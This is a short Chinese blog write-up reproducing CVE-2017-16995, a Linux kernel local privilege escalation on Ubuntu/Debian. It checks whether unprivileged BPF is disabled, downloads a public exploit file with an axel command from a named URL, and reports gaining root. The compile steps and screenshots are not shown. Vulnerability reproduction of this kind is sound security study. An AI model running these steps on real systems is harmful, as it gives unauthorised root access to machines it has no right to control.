CVE-2017-16995(Ubuntu本地提權漏洞復現)
05-24
CVE-2017-16995(Ubuntu本地提權漏洞復現)
來自專欄 不會開車的廚師不是好黑客
漏洞編號:CVE-2017-16995
影響範圍:Linux Kernel Version 4.14-4.4,Ubuntu/Debian發行版本
Exp文件下載地址:http://cyseclabs.com/exploits/upstream44.c
測試環境和復現前的許可權:
可以看到版本為Linux 4.4.0版本。此時的許可權為普通許可權。
查看是否存在unprivileged_bpf_disable文件,如果存在該文件,查看文件內容是否為1,若不是1,則存在漏洞
證明存在漏洞。
復現漏洞:
首先要下載Exp文件,可以用axel這個命令來下載文件。想運用這個命令,還要安裝axel這個命令(我這裡安裝好不再演示)。安裝axel的命令為:sudo apt-get install axel
下載Exp:axel http://cyseclabs.com/exploits/upstream44.c
如圖已經下載好。下載出來的為.c文件,所以需要編譯執行,代碼如下:
可以從最後一行看到此時我們的許可權已經變成了root許可權。
推薦閱讀:
※瀏覽器廠商應對重大 CPU 安全漏洞:降低時鐘精度,禁用 SharedArrayBuffer
※metasploit 學習筆記 (二)
※美國國防部漏洞檢測標準
※Struts2-048(內附Exp & Poc)完美解決中文亂碼
※聯想IBM交換機產品安全繞過漏洞CVE-2017-3765 驚悚!HP Backdoor後門存在了13年